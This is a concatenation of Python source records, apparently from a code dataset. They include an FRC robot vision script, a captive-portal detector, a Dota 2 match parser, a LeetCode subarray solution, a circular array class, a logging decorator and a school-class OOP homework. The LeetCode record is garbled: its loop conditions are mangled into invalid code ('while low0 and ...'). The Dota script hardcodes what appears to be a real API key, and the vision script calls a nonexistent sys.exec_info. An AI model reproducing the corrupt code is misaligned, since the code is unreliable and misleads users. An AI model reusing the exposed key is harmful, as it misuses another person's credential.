68)\n tapeHSVMax = (192, 100, 255)\n\n #Values to be returned\n targetX = -1\n targetY = -1\n targetW = -1\n targetH = -1\n centerOffset = float('nan')\n foundTape = False\n \n #Find alignment tape in image\n tapeContours = process_image(imgRaw, tapeHSVMin, tapeHSVMax)\n \n #Continue with processing if alignment tape found\n if len(tapeContours) > 0:\n\n #find the largest contour and check it against the mininum tape area\n largestContour = max(tapeContours, key=cv.contourArea)\n\n if cv.contourArea(largestContour) > minTapeArea:\n \n targetX, targetY, targetW, targetH = cv.boundingRect(largestContour)\n foundTape = True\n\n #calculate center offset of tape\n centerOffset = (imgWidthVision / 2) - (targetX + (targetW / 2))\n\n return targetX, targetY, targetW, targetH, centerOffset, foundTape\n\n\n#Define contour detector function\ndef detect_vision_targets(imgRaw):\n\n #Set constraints for detecting vision targets\n visionTargetWidth = 3.313 #in inches\n visionTargetHeight = 5.826 #in inches\n minTargetArea = 750 #in square px, for individual pieces of tape, calculated for viewing from ~4ft\n minRegionArea = 3200 #in square px, for paired pieces of tape, calculated for viewing from ~4ft\n\n #Define HSV range for cargo ship vision targets\n #values with light in Fab Lab\n visionTargetHSVMin = (77, 131, 73)\n visionTargetHSVMax = (96, 255, 255)\n #values from image testing\n #visionTargetHSVMin = (63, 0, 87)\n #visionTargetHSVMax = (108, 255, 255)\n\n #List to collect datapoints of all contours located\n #Append tuples in form (x, y, w, h, a)\n visionTargetValues = []\n\n #List to collect datapoints and area of all paired contours calculated\n #Append tuples in form (regionArea, x, y, w, h)\n visionRegionValues = []\n\n #Other processing values\n inchesPerPixel = -1\n diffTargets = -1\n \n #Values to be returned\n targetX = -1\n targetY = -1\n targetW = -1\n targetH = -1\n centerOffset = 1000\n distanceToVisionTarget = -1\n angleToVisionTarget = 1000 #default set to 
not-a-number\n foundVisionTarget = False\n\n #Find contours in mask\n visionTargetContours = process_image(imgRaw, visionTargetHSVMin, visionTargetHSVMax)\n \n #only continue if contours are found\n if len(visionTargetContours) > 0:\n \n #Loop over all contours\n for testContour in visionTargetContours:\n\n #Get bounding rectangle dimensions\n x, y, w, h = cv.boundingRect(testContour)\n rect = cv.minAreaRect(testContour)\n a = rect[2]\n box = cv.boxPoints(rect)\n box = np.int0(box)\n cv.drawContours(imgRaw,[box],0,(0,0,255),2) \n\n #If large enough, draw a rectangle and store the values in the list\n if cv.contourArea(testContour) > minTargetArea:\n\n #cv.rectangle(imgRaw,(x,y),(x+w,y+h),(0,0,255),2)\n\n visionTargetTuple = (x, y, w, h, a)\n visionTargetValues.append(visionTargetTuple)\n\n #Only continue if two appropriately sized contours were found\n if len(visionTargetValues) > 1:\n\n #Sort the contours found into a left-to-right order (sorting by x-value)\n visionTargetValues.sort(key=itemgetter(0))\n\n #Compare each contour to the next-right-most contour to determine distance between them\n for i in range(len(visionTargetValues) - 1):\n\n #Create a conversion factor between inches and pixels with a known value (the target height)\n #and the height of the left-most contour found\n inchesPerPixel = visionTargetHeight/visionTargetValues[i][3]\n \n #Calculate the pixel difference between contours (right x - (left x + left width))\n diffTargets = visionTargetValues[i + 1][0] - (visionTargetValues[i][0] + visionTargetValues[i][2])\n \n #Check the distance against the expected angle with a tolerance, check the area, and store \n #the matched pairs in the indices list\n if visionTargetValues[i][4] < -65 and visionTargetValues[i+1][4] > -25:\n\n #Calculate area of region found (height * (left width + right width + diffTargets))\n regionHeight = visionTargetValues[i][3] #using left height\n regionWidth = visionTargetValues[i][2] + visionTargetValues[i + 1][2] + diffTargets\n regionArea = regionWidth * regionHeight\n\n #Check area and draw rectangle (for testing)\n if regionArea > minRegionArea:\n\n x = visionTargetValues[i][0]\n y = visionTargetValues[i][1]\n w = regionWidth\n h = regionHeight\n cv.rectangle(imgRaw,(x,y),(x+w,y+h),(0,0,255),1) \n \n visionRegionTuple = (regionArea, x, y, w, h)\n visionRegionValues.append(visionRegionTuple)\n \n #Only proceed if an appropriately sized merged region is found\n if len(visionRegionValues) > 0:\n\n #Sort the collected paired regions from largest area to smallest area (largest area is index 0)\n visionRegionValues.sort(key=itemgetter(0), reverse = True)\n\n #Assign final values to be returned\n targetX = visionRegionValues[0][1]\n targetY = visionRegionValues[0][2]\n targetW = visionRegionValues[0][3]\n targetH = visionRegionValues[0][4]\n\n centerOffset = (imgWidthVision / 2) - (targetX + (targetW / 2))\n\n foundVisionTarget = True\n \n distanceToVisionTarget = inchesPerPixel * (imgWidthVision / (2 * math.tan(math.radians(cameraFieldOfView))))\n offsetInInches = inchesPerPixel * ((targetX + targetW/2) - imgWidthVision / 2)\n angleToVisionTarget = math.degrees(math.atan((offsetInInches / distanceToVisionTarget)))\n\n #Return results\n return targetX, targetY, targetW, targetH, distanceToVisionTarget, angleToVisionTarget, centerOffset, foundVisionTarget\n\n\n#Define main processing function\ndef main():\n\n #Define global variables\n global imgWidthDriver\n global imgHeightDriver\n global imgWidthVision\n global imgHeightVision\n\n #Define local 
variables\n driverCameraBrightness = 50\n visionCameraBrightness = 0\n driverFramesPerSecond = 15\n visionFramesPerSecond = 30\n\n #Define local flags\n networkTablesConnected = False\n driverCameraConnected = False\n visionCameraConnected = False\n foundBall = False\n foundTape = False\n foundVisionTarget = False\n\n #Get current time as a string\n currentTime = time.localtime(time.time())\n timeString = str(currentTime.tm_year) + str(currentTime.tm_mon) + str(currentTime.tm_mday) + str(currentTime.tm_hour) + str(currentTime.tm_min)\n\n #Open a log file\n logFilename = '/data/Logs/Run_Log_' + timeString + '.txt'\n log_file = open(logFilename, 'w')\n log_file.write('run started on %s.\\n' % datetime.datetime.now())\n log_file.write('')\n\n #Load VMX module\n vmxpi = imp.load_source('vmxpi_hal_python', '/usr/local/lib/vmxpi/vmxpi_hal_python.py')\n vmx = vmxpi.VMXPi(False,50)\n if vmx.IsOpen() is False:\n log_file.write('Error: Unable to open VMX Client.\\n')\n log_file.write('\\n')\n log_file.write(' - Is pigpio (or the system resources it requires) in use by another process?\\n')\n log_file.write(' - Does this application have root privileges?')\n log_file.close()\n sys.exit(0)\n\n #Connect NetworkTables\n try:\n NetworkTables.initialize(server='10.41.21.2')\n visionTable = NetworkTables.getTable(\"vision\")\n navxTable = NetworkTables.getTable(\"navx\")\n smartDash = NetworkTables.getTable(\"SmartDashboard\")\n networkTablesConnected = True\n log_file.write('Connected to Networktables on 10.41.21.2 \\n')\n except:\n log_file.write('Error: Unable to connect to Network tables.\\n')\n log_file.write('Error message: ', sys.exec_info()[0])\n log_file.write('\\n')\n\n #Navx configuration\n navxTable.putNumber(\"ZeroGyro\", 0)\n #navxTable.putNumber(\"ZeroDisplace\", 0)\n\n #Reset yaw gyro\n vmx.getAHRS().Reset()\n vmx.getAHRS().ZeroYaw()\n\n #Reset displacement\n vmx.getAHRS().ResetDisplacement()\n\n #Set up a camera server\n camserv = CameraServer.getInstance()\n camserv.enableLogging\n\n #Start capturing webcam videos\n try:\n driverCameraPath = '/dev/v4l/by-path/platform-3f980000.usb-usb-0:1.5:1.0-video-index0'\n driverCamera = camserv.startAutomaticCapture(name = \"DriverCamera\", path=driverCameraPath)\n driverCamera.setResolution(imgWidthDriver, imgHeightDriver)\n driverCamera.setBrightness(driverCameraBrightness)\n driverCamera.setFPS(driverFramesPerSecond)\n driverCameraConnected = True\n log_file.write('Connected to driver camera on ID = 0.\\n')\n except:\n log_file.write('Error: Unable to connect to driver camera.\\n')\n log_file.write('Error message: ', sys.exec_info()[0])\n log_file.write('\\n')\n\n try:\n visionCameraPath = '/dev/v4l/by-path/platform-3f980000.usb-usb-0:1.4:1.0-video-index0'\n visionCamera = cs.UsbCamera(name=\"VisionCamera\", path=visionCameraPath)\n visionCamera.setResolution(imgWidthVision, imgHeightVision)\n visionCamera.setBrightness(visionCameraBrightness)\n visionCamera.setFPS(visionFramesPerSecond)\n visionCameraConnected = True\n except:\n log_file.write('Error: Unable to connect to vision camera.\\n')\n log_file.write('Error message: ', sys.exec_info()[0])\n log_file.write('\\n') \n\n #Define vision video sink\n if driverCameraConnected == True:\n driverSink = camserv.getVideo(name = 'DriverCamera')\n if visionCameraConnected == True:\n visionSink = cs.CvSink(name = 'VisionCamera')\n visionSink.setSource(visionCamera)\n\n #Define output stream for driver camera images\n if (driverCameraConnected == True):\n driverOutputStream = 
camserv.putVideo(\"DriveCamera\", imgWidthDriver, imgHeightDriver)\n \n #Define output stream for processed vision images (for testing only!)\n if (visionCameraConnected == True):\n visionOutputStream = camserv.putVideo(\"VisionCamera\", imgWidthVision, imgHeightVision)\n\n #Set video codec and create VideoWriter\n if writeVideo == True:\n fourcc = cv.VideoWriter_fourcc(*'XVID')\n videoFilename = '/data/Match_Videos/RobotVisionCam-' + timeString + '.mp4'\n visionImageOut = cv.VideoWriter(videoFilename,fourcc,visionFramesPerSecond,(imgWidthVision,imgHeightVision))\n\n #Create blank vision image\n imgDriver= np.zeros(shape=(imgWidthDriver, imgHeightDriver, 3), dtype=np.uint8)\n imgVision= np.zeros(shape=(imgWidthVision, imgHeightVision, 3), dtype=np.uint8)\n\n #Start main processing loop\n while (True):\n\n #Read in an image from 2019 Vision Images (for testing)\n #img = cv.imread('RetroreflectiveTapeImages2019/CargoStraightDark90in.jpg')\n #if img is None:\n # break\n\n #Initialize video time stamp\n visionVideoTimestamp = 0\n \n #Grab frames from the vision web camera\n if driverCameraConnected == True:\n driverVideoTimestamp, imgDriver = driverSink.grabFrame(imgDriver)\n if visionCameraConnected == True:\n visionVideoTimestamp, imgVision = visionSink.grabFrame(imgVision)\n\n #Check for frame errors\n visionFrameGood = True\n if (visionVideoTimestamp == 0) and (visionCameraConnected == True):\n log_file.write('Vision video error: \\n')\n log_file.write(visionSink.getError())\n log_file.write('\\n')\n visionFrameGood = False\n sleep (float(visionFramesPerSecond * 2) / 1000.0)\n continue\n\n #Put driver frame in output stream\n if (driverCameraConnected == True):\n driverOutputStream.putFrame(imgDriver)\n\n #Continue processing if we have no errors\n if (visionFrameGood == True):\n\n #Call detection methods\n ballX, ballY, ballRadius, ballDistance, ballAngle, ballOffset, ballScreenPercent, foundBall = detect_ball_target(imgVision)\n #tapeX, tapeY, tapeW, tapeH, tapeOffset, foundTape = detect_floor_tape(imgVision)\n visionTargetX, visionTargetY, visionTargetW, visionTargetH, visionTargetDistance, visionTargetAngle, visionTargetOffset, foundVisionTarget = detect_vision_targets(imgVision)\n\n #Update networktables and log file\n if networkTablesConnected == True:\n\n visionTable.putNumber(\"RobotStop\", 0)\n visionTable.putBoolean(\"WriteVideo\", writeVideo)\n\n visionTable.putNumber(\"BallX\", round(ballX, 2))\n visionTable.putNumber(\"BallY\", round(ballY, 2))\n visionTable.putNumber(\"BallRadius\", round(ballRadius, 2))\n visionTable.putNumber(\"BallDistance\", round(ballDistance, 2))\n visionTable.putNumber(\"BallAngle\", round(ballAngle, 2))\n visionTable.putNumber(\"BallOffset\", round(ballOffset, 2))\n visionTable.putNumber(\"BallScreenPercent\", round(ballScreenPercent, 2))\n visionTable.putBoolean(\"FoundBall\", foundBall)\n \n if foundBall == True:\n \n log_file.write('Cargo found at %s.\\n' % datetime.datetime.now())\n log_file.write(' Ball distance: %.2f \\n' % round(ballDistance, 2))\n log_file.write(' Ball angle: %.2f \\n' % round(ballAngle, 2))\n log_file.write(' Ball offset: %.2f \\n' % round(ballOffset, 2))\n log_file.write('\\n')\n\n if foundTape == True:\n visionTable.putNumber(\"TapeX\", round(tapeX, 2))\n visionTable.putNumber(\"TapeY\", round(tapeY, 2))\n visionTable.putNumber(\"TapeW\", round(tapeW, 2))\n visionTable.putNumber(\"TapeH\", round(tapeH, 2))\n visionTable.putNumber(\"TapeOffset\", round(tapeOffset, 2))\n visionTable.putBoolean(\"FoundTape\", foundTape)\n 
log_file.write('Floor tape found at %s.\\n' % datetime.datetime.now())\n log_file.write(' Tape offset: %.2f \\n' % round(tapeOffset, 2))\n log_file.write('\\n')\n\n\n visionTable.putNumber(\"VisionTargetX\", round(visionTargetX, 2))\n visionTable.putNumber(\"VisionTargetY\", round(visionTargetY, 2))\n visionTable.putNumber(\"VisionTargetW\", round(visionTargetW, 2))\n visionTable.putNumber(\"VisionTargetH\", round(visionTargetH, 2))\n visionTable.putNumber(\"VisionTargetDistance\", round(visionTargetDistance, 2))\n visionTable.putNumber(\"VisionTargetAngle\", round(visionTargetAngle, 2))\n visionTable.putNumber(\"VisionTargetOffset\", round(visionTargetOffset, 2))\n visionTable.putBoolean(\"FoundVisionTarget\", foundVisionTarget)\n\n if foundVisionTarget == True:\n \n log_file.write('Vision target found at %s.\\n' % datetime.datetime.now())\n log_file.write(' Vision target distance: %.2f \\n' % round(visionTargetDistance, 2))\n log_file.write(' Vision target angle: %.2f \\n' % round(visionTargetAngle, 2))\n log_file.write(' Vision target offset: %.2f \\n' % round(visionTargetOffset, 2))\n log_file.write('\\n')\n\n #Draw various contours on the image\n if foundBall == True:\n cv.circle(imgVision, (int(ballX), int(ballY)), int(ballRadius), (0, 255, 0), 2) #ball\n cv.putText(imgVision, 'Distance to Ball: %.2f' %ballDistance, (320, 400), cv.FONT_HERSHEY_SIMPLEX, .75,(0, 0, 255), 2)\n cv.putText(imgVision, 'Angle to Ball: %.2f' %ballAngle, (320, 440), cv.FONT_HERSHEY_SIMPLEX, .75,(0, 0, 255), 2) \n if foundTape == True:\n cv.rectangle(imgVision,(tapeX,tapeY),(tapeX+tapeW,tapeY+tapeH),(100,0,255),1) #floor tape\n if foundVisionTarget == True:\n cv.rectangle(imgVision,(visionTargetX,visionTargetY),(visionTargetX+visionTargetW,visionTargetY+visionTargetH),(0,255,0),2) #vision targets\n cv.putText(imgVision, 'Distance to Vision: %.2f' %visionTargetDistance, (10, 400), cv.FONT_HERSHEY_SIMPLEX, .75,(0, 255, 0), 2)\n cv.putText(imgVision, 'Angle to Vision: %.2f' %visionTargetAngle, (10, 440), cv.FONT_HERSHEY_SIMPLEX, .75,(0, 255, 0), 2)\n\n #Put timestamp on image\n cv.putText(imgVision, str(datetime.datetime.now()), (10, 30), cv.FONT_HERSHEY_SIMPLEX, .5, (0, 0, 255), 2)\n\n #Update navx network table\n if networkTablesConnected == True:\n navxTable.putNumber(\"GyroAngle\", round(vmx.getAHRS().GetAngle(), 2))\n navxTable.putNumber(\"GyroYaw\", round(vmx.getAHRS().GetYaw(), 2))\n navxTable.putNumber(\"GyroPitch\", round(vmx.getAHRS().GetPitch(), 2))\n navxTable.putNumber(\"YVelocity\", round(vmx.getAHRS().GetVelocityY(), 4))\n navxTable.putNumber(\"XVelocity\", round(vmx.getAHRS().GetVelocityX(), 4))\n navxTable.putNumber(\"YDisplacement\", round(vmx.getAHRS().GetDisplacementY(), 4))\n navxTable.putNumber(\"XDisplacement\", round(vmx.getAHRS().GetDisplacementX(), 4))\n navxTable.putNumber(\"YVelocity\", round(vmx.getAHRS().GetVelocityY(), 4))\n navxTable.putNumber(\"XVelocity\", round(vmx.getAHRS().GetVelocityX(), 4))\n navxTable.putNumber(\"YAccel\", round(vmx.getAHRS().GetWorldLinearAccelY(), 4))\n navxTable.putNumber(\"XAccel\", round(vmx.getAHRS().GetWorldLinearAccelX(), 4))\n\n #Check vision network table dashboard value\n sendVisionToDashboard = visionTable.getNumber(\"SendVision\", 0)\n\n #Send vision to dashboard (for testing)\n if (visionCameraConnected == True) and (sendVisionToDashboard == 1):\n visionOutputStream.putFrame(imgVision)\n \n #Write processed image to file\n if (writeVideo == True) and (visionCameraConnected == True):\n visionImageOut.write(imgVision)\n\n #Display the vision 
camera stream (for testing only)\n #cv.imshow(\"Vision\", imgVision)\n\n #Check for gyro re-zero\n gyroInit = navxTable.getNumber(\"ZeroGyro\", 0)\n if gyroInit == 1:\n vmx.getAHRS().Reset()\n vmx.getAHRS().ZeroYaw()\n navxTable.putNumber(\"ZeroGyro\", 0)\n\n #Check for displacement zero\n #dispInit = navxTable.getNumber(\"ZeroDisplace\", 0)\n #if dispInit == 1:\n # vmx.getAHRS().ResetDisplacement()\n # navxTable.putNumber(\"ZeroDisplace\", 0)\n \n #Check for stop code from robot or keyboard (for testing)\n #if cv.waitKey(1) == 27:\n # break\n robotStop = visionTable.getNumber(\"RobotStop\", 0)\n if (robotStop == 1) or (visionCameraConnected == False) or (networkTablesConnected == False):\n break\n\n\n #Close all open windows (for testing)\n #cv.destroyAllWindows()\n\n #Close video file\n visionImageOut.release()\n\n #Close the log file\n log_file.write('Run stopped on %s.' % datetime.datetime.now())\n log_file.close()\n \n\n#define main function\nif __name__ == '__main__':\n main()\n","sub_path":"Team4121VisionMotion2019Rev2.py","file_name":"Team4121VisionMotion2019Rev2.py","file_ext":"py","file_size_in_byte":27213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"4119839","text":"\"\"\"Detects whether this system is behind a captive gateway\n\nMany public WiFi hotspots utilize a captive gateway that redirects all\nHTTP traffic to a gateway page (and blocks all non-HTTP traffic) until\na user agreement on said page is agreed to. This module can detect\nwhether this system is currently behind a captive gateway, and provide\nthe URL of the gateway page.\n\"\"\"\n\nimport urllib2\n\nVERSION = '0.1'\n\ndef is_captive():\n \"\"\"True if this system is behind a captive gateway; False otherwise.\"\"\"\n return get_portal_url() != None\n\ndef get_portal_url():\n \"\"\"If this system is behind a captive gateway, returns the URL of\n the gateway page as a String; otherwise, returns None.\"\"\"\n try:\n # The IANA's website should hopefully always be up.\n test_url = 'http://www.iana.org/'\n url = urllib2.urlopen(test_url).geturl()\n if url != test_url:\n return url\n else:\n return None\n except urllib2.URLError:\n return None\n","sub_path":"captivedetect.py","file_name":"captivedetect.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"301692219","text":"from __future__ import print_function\nimport time\nimport dota2api\nimport od_python\nimport json\nfrom od_python.rest import ApiException\nfrom pprint import pprint\n# create an instance of the API class\napi_instance = od_python.MatchesApi()\n\njson_data = open('data.json').read()\ndata = json.loads(json_data)\n\ndota_api = dota2api.Initialise(\"55D5E24E25F8BE9CD06760ED7F0F9BE6\")\n\ndef id_parse(data):\n\tprev_id = 0\n\tmatches = []\n\tfor match in data:\n\t\tif match['match_id'] != prev_id:\n\t\t\tprev_id = match['match_id']\n\t\t\tmatches.append(prev_id)\n\n\tprint('%d matches parsed' % len(matches))\n\treturn matches\n\n\ndef match_parse(matches):\n\tparsed_matches = []\n\t#counter = 0\n\tfor match in matches:\n\t\tapi_response = api_instance.matches_match_id_get(match)\n\t\tpprint(api_response.draft_timings[0])\n\t\tentry = {'draft' : api_response.draft_timings, 'win' : api_response.radiant_win}\n\t\tparsed_matches.append(entry)\n\t\t#pprint(entry)\n\t\ttime.sleep(1) #rate limit exceeded\n\t\t#draft_parse(entry['draft'])\n\t\t#break\n\treturn parsed_matches\n\ndef 
draft_parse(draft_timings):\n\tfor pick in draft_timings:\n\t\tpprint(pick)\n\t\t\n\ntry:\n # GET /benchmarks\n matches = id_parse(data)\n pprint(matches)\n parsed_matches = match_parse(matches)\n with open('drafts.json', 'w') as outfile:\n \toutfile.write(\"%s\" % parsed_matches)\n\nexcept ApiException as e:\n print(\"Exception when calling dota2api: %s\\n\" % e)\n","sub_path":"RNN/parse_matches.py","file_name":"parse_matches.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"441632705","text":"class Solution:\n def findUnsortedSubarray(self, nums: List[int]) -> int:\n if len(nums)<2:\n return 0\n \n low = 0\n high = len(nums) - 1\n \n while low0 and nums[high]>nums[high-1]:\n high -= 1\n \n if low>high:\n return 0\n \n tmpMin,tmpMax = min(nums[low:high+1]),max(nums[low:high+1])\n \n while low>0 and tmpMinnums[high+1]:\n high += 1\n \n return high-low+1\n","sub_path":"Python/581_Shortest_Unsorted_Continuous_Subarray.py","file_name":"581_Shortest_Unsorted_Continuous_Subarray.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"416891934","text":"import logging\n\n\ndef log(func):\n\n def wrapper(*args, **kwargs):\n logger.info(\"Program started\")\n res = func(*args, **kwargs)\n logger.info(\"Done!\")\n return res\n\n return wrapper\n\n\nlogger = logging.getLogger('test_log')\n\nformatter = logging.Formatter('%(asctime)s - %(levelname)s - %(module)s - %(funcName)s - %(message)s')\nfn = logging.FileHandler('log_task_1.log')\nfn.setLevel(logging.DEBUG)\nfn.setFormatter(formatter)\n\nlogger.addHandler(fn)\nlogger.setLevel(logging.DEBUG)\n","sub_path":"log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"209793461","text":"\"\"\"Implement a Circular Array\n\nA circular array is defined by having a start and indexes (be\nsure to think about optimizing runtime for indexing)::\n\n >>> circ = CircularArray()\n >>> circ.add_item('harry')\n >>> circ.add_item('hermione')\n >>> circ.add_item('ginny')\n >>> circ.add_item('ron')\n >>> circ.print_array()\n harry\n hermione\n ginny\n ron\n >>> circ.get_by_index(2)\n 'ginny'\n >>> print(circ.get_by_index(15))\n None\n\nHowever, the last item circles back around to the first item, \nso you can also rotate the list and shift the indexes. 
Positive\nnumbers rotate the list start to the right (or higher indexes)::\n\n    >>> circ = CircularArray()\n    >>> circ.add_item('harry')\n    >>> circ.add_item('hermione')\n    >>> circ.add_item('ginny')\n    >>> circ.add_item('ron')\n    >>> circ.rotate(1)\n    >>> circ.print_array()\n    hermione\n    ginny\n    ron\n    harry\n    >>> circ.get_by_index(2)\n    'ron'\n\nAnd negative numbers rotate the list start to the left (or lower\nindexes)::\n\n    >>> circ = CircularArray()\n    >>> circ.add_item('harry')\n    >>> circ.add_item('hermione')\n    >>> circ.add_item('ginny')\n    >>> circ.add_item('ron')\n    >>> circ.rotate(-1)\n    >>> circ.print_array()\n    ron\n    harry\n    hermione\n    ginny\n    >>> circ.get_by_index(2)\n    'hermione'\n\nAnd you can also rotate more than once around the ring::\n\n    >>> circ = CircularArray()\n    >>> circ.add_item('harry')\n    >>> circ.add_item('hermione')\n    >>> circ.add_item('ginny')\n    >>> circ.add_item('ron')\n    >>> circ.rotate(-17)\n    >>> circ.get_by_index(1)\n    'harry'\n\nIf you add a new item after rotating, it should go at the end of\nthe list in its current rotation::\n\n    >>> circ = CircularArray()\n    >>> circ.add_item('harry')\n    >>> circ.add_item('hermione')\n    >>> circ.add_item('ginny')\n    >>> circ.add_item('ron')\n    >>> circ.rotate(-2)\n    >>> circ.add_item('dobby')\n    >>> circ.print_array()\n    ginny\n    ron\n    harry\n    hermione\n    dobby\n\n\"\"\"\n\n\nclass CircularArray(object):\n    \"\"\"An array that may be rotated, and items retrieved by index\"\"\"\n\n    def __init__(self):\n        \"\"\"Instantiate CircularArray.\"\"\"\n        self.items = []\n        self.length = 0\n\n    def add_item(self, item):\n        \"\"\"Add item to array, at the end of the current rotation.\"\"\"\n        self.items.append(item)\n        self.length += 1\n\n    def get_by_index(self, index):\n        \"\"\"Return the data at a particular index.\"\"\"\n        if index > self.length - 1:\n            return None\n        else:\n            return self.items[index]\n\n    def rotate(self, increment):\n        \"\"\"Rotate array, positive for right, negative for left.\n\n        If increment is greater than list length, keep going around.\n        \"\"\"\n\n        shift = increment % self.length\n        # result = self.items * 2\n        # self.items = result[shift:shift + self.length]\n\n        result = [None for i in range(self.length)]\n        for i in range(self.length):\n            index = ((i - shift) % self.length)\n            result[index] = self.items[i]\n\n        self.items = result\n\n    def print_array(self):\n        \"\"\"Print the circular array items in order, one per line\"\"\"\n        for item in self.items:\n            print(item)\n\n\nif __name__ == \"__main__\":\n    print()\n    import doctest\n\n    if doctest.testmod().failed == 0:\n        print(\"*** ALL TESTS PASSED; YOU MUST BE DIZZY WITH JOY! ***\")\n        print()\n","sub_path":"MEDIUM/circular-array/circular_array.py","file_name":"circular_array.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
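# (Editor's aside on the CircularArray record above: rotate() is plain modular
# index arithmetic. A minimal standalone sketch with made-up data:)
items = ['harry', 'hermione', 'ginny', 'ron']
shift = -17 % len(items)            # Python's % is always non-negative here: -17 -> 3
rotated = items[shift:] + items[:shift]
print(rotated)                      # -> ['ron', 'harry', 'hermione', 'ginny'], so index 1 is 'harry'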
+{"seq_id":"365247480","text":"# Task 1:\n# Implement the task described below using OOP paradigms:\n# A school has Classes (5A, 7B, etc.) in which Students study.\n# Every student has two Parents (a mother and a father).\n# Teachers also teach at the school. One teacher may teach his or her\n# particular subject in an unlimited number of classes.\n# I.e. teacher Ivanov may teach mathematics to 5A and 6B,\n# but nobody else may teach mathematics.\n\n\n\n# The chosen, data-filled structure must solve the following tasks:\n# 1. Get the full list of all classes of the school\n# 2. Get the list of all students of a given class\n#    (every student is displayed as \"Surname F.P.\")\n# 3. Get the list of all subjects of a given student\n#    (Student --> Class --> Teachers --> Subjects)\n# 4. Get the full names of the parents of a given student\n# 5. Get the list of all Teachers teaching in a given class\n\nclass ClassRoom:\n    def __init__(self, class_room):\n        self.class_room = class_room\n\nclass Person:\n    def __init__(self, name, surname, father_name):\n        self.name = name\n        self.surname = surname\n        self.father_name = father_name\n\n    def get_ini_name(self):\n        return '{} {}.{}.'.format(self.surname.title(), self.name[0].upper(), self.father_name[0].upper())\n\n\nclass Student(Person):\n    def __init__(self, name, surname, father_name, class_room, father, mother):\n        Person.__init__(self, name, surname, father_name)\n        self.class_room = class_room\n        self.father = father\n        self.mother = mother\n\n    def get_class_room(self):\n        return self.class_room\n\n    def get_parents(self):\n        return self.father.get_ini_name(), self.mother.get_ini_name()\n\nclass Teacher(Person):\n    def __init__(self, name, surname, father_name, classes, subject):\n        Person.__init__(self, name, surname, father_name)\n        self.classes = classes\n        self.subject = subject\n\n    def get_subject(self):\n        return self.subject\n\n    def get_classes(self):\n        return self.classes\n\n# set up the data\n\n\nclass_rooms = ['5А', '6А', '7А', '8А', '9А']\n\nparents = [Person(\"Иван\", \"Петров\", \"Александрович\"),\n           Person(\"Татьяна\", \"Петрова\", \"Александровна\"),\n           Person(\"Игорь\", \"Сидоров\", \"Александрович\"),\n           Person(\"Оксана\", \"Сидорова\", \"Александровна\"),\n           Person(\"Виталий\", \"Иванов\", \"Александрович\"),\n           Person(\"Милана\", \"Иванова\", \"Александровна\")]\n\nstudents = [Student(\"Александр\", \"Иванов\", \"Витальевич\", class_rooms[2], parents[4], parents[5]),\n            Student(\"Александра\", \"Иванова\", \"Витальевна\", class_rooms[0], parents[4], parents[5]),\n            Student(\"Петр\", \"Сидоров\", 'Игоревич', class_rooms[1], parents[2], parents[3]),\n            Student(\"Октябрина\", \"Сидорова\", 'Игоревна', class_rooms[3], parents[2], parents[3]),\n            Student(\"Иван\", \"Петров\", 'Иванович', class_rooms[4], parents[0], parents[1]),\n            Student(\"Илона\", \"Петрова\", 'Ивановна', class_rooms[2], parents[0], parents[1])]\n\nteachers = [Teacher(\"Феофан\", \"Грек\", \"Батькович\", [class_rooms[0], class_rooms[1]], 'Русский язык'),\n            Teacher(\"Андрей\", \"Зырянов\", \"Александрович\", [class_rooms[2], class_rooms[1]], 'История'),\n            Teacher(\"Ульяна\", \"Харитонова\", \"Яковлевна\", [class_rooms[3], class_rooms[4]], 'Литература')]\n\n # 1. Get the full list of all classes of the school\nprint('Full list of all classes of the school: ')\nprint('class_rooms ', class_rooms)\n\n # 2. Get the list of all students of the given class\n # (every student is displayed as \"Surname F.P.\")\nprint(\"List of all students of the given class: \")\nfor num, student in enumerate(students, start=1):\n    print(\"{}) {} class: {}\".format(num, student.get_ini_name(), student.class_room))\n\n # 3. Get the list of all subjects of the given student\n # (Student --> Class --> Teachers --> Subjects)\n\nstudent = students[0]\nt_list = [val for val in teachers if student.get_class_room() in val.get_classes()]\nt_names = [val.get_ini_name() for val in t_list]\nsubj = [val.get_subject() for val in t_list]  # fixed: take the subjects of this student's teachers, not of all teachers\nprint(student.get_ini_name() + ' --> ' + student.get_class_room() + ' --> ' + ' '.join(map(str, t_names)) + '--> ' + ' '.join(map(str, subj)))\n\n # 4. Get the full names of the parents of the given student\nst_parents = student.get_parents()\nprint('Parents of student ', student.get_ini_name(), ' ', st_parents)\n\n # 5. Get the list of all Teachers teaching in the given class\nprint('Teachers teaching in the class:')\nfor num, teacher in enumerate(teachers, start=1):\n    print(\"{}) {} class: {}\".format(num, teacher.get_ini_name(), teacher.classes))\n","sub_path":"lesson06/home_work/hw06_normal.py","file_name":"hw06_normal.py","file_ext":"py","file_size_in_byte":6085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
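Task 5 can also be phrased as a small reusable helper (an illustrative sketch, not part of the original assignment):

    def teachers_for_class(class_room, teachers):
        # teachers whose class list contains the given class
        return [t.get_ini_name() for t in teachers if class_room in t.get_classes()]

    print(teachers_for_class('5А', teachers))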
